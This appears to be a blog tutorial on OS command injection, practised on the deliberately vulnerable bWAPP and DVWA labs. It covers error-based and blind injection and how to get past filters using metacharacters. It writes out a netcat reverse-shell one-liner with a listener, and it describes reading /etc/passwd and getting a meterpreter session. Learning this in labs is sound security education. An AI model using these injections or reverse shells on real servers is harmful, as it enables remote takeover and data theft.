Hey folks, in this tutorial we are going to talk about the command injection vulnerability. A web server can be completely compromised by the attacker if the command injection vulnerability is on the web application because this vulnerability can give us the privileges to execute the command on the web server after which the attacker can change the configuration or make own by executing arbitrary commands. In this tutorial, we will also learn how we can avoid this vulnerability along with taking advantage.

Lets do it 🙂 !!

What is Command Injection?

A command injection is a class of injection vulnerabilities that occur when a system sends data (forms, cookies, HTTP headers, etc.) given by an insecure user to the system shell. The command injection vulnerability allows an attacker to remotely execute operating system commands on the target system, but make sure we have the privileges to do all this. Through this vulnerability attacker can extends the functionality of the application after which they can execute the system command without injection the necessary code. Similarly OS command injection allow attackers to execute unexpected, dangerous commands directly on the operating system. Source : owasp.org

Types of Command Injection

Two type of command injection vulnerability are found in web applications.

Error based injection : If the user injects a malicious command via input and the result is reflected on someone else or the same web page, meaning that the web application is vulnerable to error command injection.

Blind based Injection : If the attacker inject the malicious code through the input but outcomes does not appear on the web page which means the web application is vulnerable to the blind based Injection. In this case, the attackers try a variety of methods to identify the vulnerability.

Command Injection Metacharacters

If the user data is not strictly validated, an attacker can help and use shell Metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.

Error based injection – Low Setting

For the purpose of practice we are using the bWAAP vulnerable web application. Now first we will try to bypass the low level security, hence lets select the low security.

You can analyze the back end code of the vulnerable web application that indicate it will not sanitize the input of users in low security.

In the code below, developer does not implement any type of filter even after giving “nslookup“, the next command will be executed.

To understand, here is an example of the “&” command that will execute one command after another and with the same methodologies we will exploit the command injection vulnerability.

The input is available for ping any host address but with the help of special metacharacters we will trying to bypassing it.

On executing the command, we got the information of listing directory. Similarly we can obtain more details from the web server through using the metacharacters.

Error based injection – Medium Settings

Now Let upgrade the security level and move to medium.

Here you can see that the “&‘ symbol is not working in medium level security. Now we will try to identify the vulnerability by embedding another metacharacters.

Great ! As soon as we implement the pipe metacharacters between commands, it displayed the “/etc/passwd” file on the web page.


Now we will take advantage of this vulnerability and get the shell of the web server by injecting nc one-liner on the input.
Usage 🙂 nc -e /bin/bash < Your IP Address > < PORT>

After injecting the payload you will see that we are successfully connected to the web server.
Usage 🙂 nc -lvvp

Similarly, we can get a lot of information from a web server by injecting arbitrary commands remotely on the web server.

Blind based Injection

Suppose the attacker injects code into the input to identify a command injection vulnerability on the web server and if the code executes successfully, but the results do not appear on the web page, this means that the vulnerability is blind based might be possible. The same scenario happens to us and when we execute the code in the input, the results are not visible on the webpage.

We have failed many times so we will take a meterpreter session of the web server.

Boom ! as you can see we have finally got a meterpreter session of the web server.


DVWA is another option where we can perform such attacks and increase our penetration testing skills. Lets take an example of this application. We have set security at a high level.

Here you can analyze the source code of this vulnerability, Where already have create the black list of metacharacters but we will trying to bypassing it.

We have successfully overcome the restrictions and obtained internal server information.


  • Your script should filter metacharacters from user input.
  • The developer should implement a blacklist on the input.

Source : https://www.hackingarticles.in

About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.

Leave a Reply